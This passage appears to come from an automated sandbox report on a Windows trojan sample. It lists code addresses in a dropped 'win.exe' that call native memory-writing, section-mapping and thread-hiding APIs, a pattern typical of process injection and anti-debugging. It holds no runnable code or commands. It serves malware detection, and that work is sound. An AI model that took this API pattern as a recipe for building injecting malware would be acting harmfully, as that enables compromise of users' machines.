Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4D2A NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B5D21 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4520 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B9933 NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4948 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B5146 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B995D NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B9951 NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B996E NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B5D71 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4570 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B518F NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4D83 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4985 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B999B NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B5D90 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B5DAD NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B45B5 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B51C7 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4DE9 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B5DE9 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B99E9 NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B45E0 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B45E4 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B45F9 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B49F4 NtWriteVirtualMemory
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9417 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A98CB LoadLibraryA,NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5CB3 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1D2E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4C68 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A506F NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4847 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5023 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4C16 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9C14 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A60FA NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A28FE NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A98F3 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A48E3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4CE4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5CE4 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A98D8 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5CD9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A44CF NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A50C5 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4899 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4570 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5D71 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A996E NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A995D NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9951 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4948 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5146 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9933 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4D2A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4520 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5D21 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45F9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A49F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4DE9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5DE9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A99E9 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45E0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45E4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A51C7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45B5 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5DAD NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A999B NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5D90 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A518F NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4D83 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4985 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A7E78 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4A73 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9A74 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9A57 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9A41 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5E47 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4638 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3E30 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5230 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4E36 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9A2F NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4A27 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9A03 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9AEC NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A46D3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1ED7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5EA8 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9AAF NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4AA0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4E99 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4694 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9A95 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A528D NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4A87 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B5C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9B4B NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2F3E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B2D NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B25 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4F14 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B00 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2B01 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A47F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9BCB NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A93CD NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4FB8 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8BBE NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4BB0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4797 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4F8C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9B83 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9417 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5CB3 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B98CB LoadLibraryA,NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1D2E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9A03 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9A2F NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A27 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4638 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3E30 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5230 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4E36 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9A41 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5E47 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9A57 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B7E78 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A73 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9A74 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B528D NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A87 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4E99 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9A95 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4694 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5EA8 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9AAF NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4AA0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B46D3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1ED7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9AEC NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2B01 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B00 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4F14 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B2D NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B25 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2F3E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9B4B NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B5C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4F8C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9B83 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4797 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4FB8 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8BBE NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4BB0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9BCB NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B93CD NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B47F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4C16 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9C14 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5023 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4847 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4C68 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B506F NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4899 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B44CF NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B50C5 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5CD9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B98D8 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B48E3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4CE4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5CE4 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B60FA NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B28FE NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B98F3 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4D2A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5D21 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4520 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9933 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4948 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5146 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B995D NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9951 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B996E NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5D71 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4570 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B518F NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4D83 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4985 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B999B NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5D90 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5DAD NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B45B5 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B51C7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4DE9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5DE9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B99E9 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B45E0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B45E4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B45F9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B49F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569417 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005698CB LoadLibraryA,NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565CB3 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560CBA D3DKMTSetStablePowerState,NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569C14 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005698D8 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565CD9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005698F3 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565CE4 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569951 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056995D NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565D71 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056996E NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569933 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565D21 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565DE9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005699E9 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565D90 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056999B NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565DAD NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569A57 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565E47 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569A41 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569A74 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056166C NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561614 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056161B NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569A03 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569A2F NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005616DF NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569AEC NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569A95 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569AAF NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565EA8 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569B4B NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056173C NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005693CD NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569BCB NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569B83 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005617B0 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00569417 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565CB3 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00560CBA D3DKMTSetStablePowerState,NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565CD9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565CE4 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565D71 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565D21 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565DE9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565D90 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565DAD NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565E47 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_0056166C NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00561614 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_0056161B NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005616DF NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565EA8 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_0056173C NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005693CD NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005617B0 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile created: C:\Windows\Lwo7Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_0040DD8B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B623F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0816
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0CBA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5CB3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B98CB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1D2E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1204
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4A27
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4638
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3E30
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0A37
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4E36
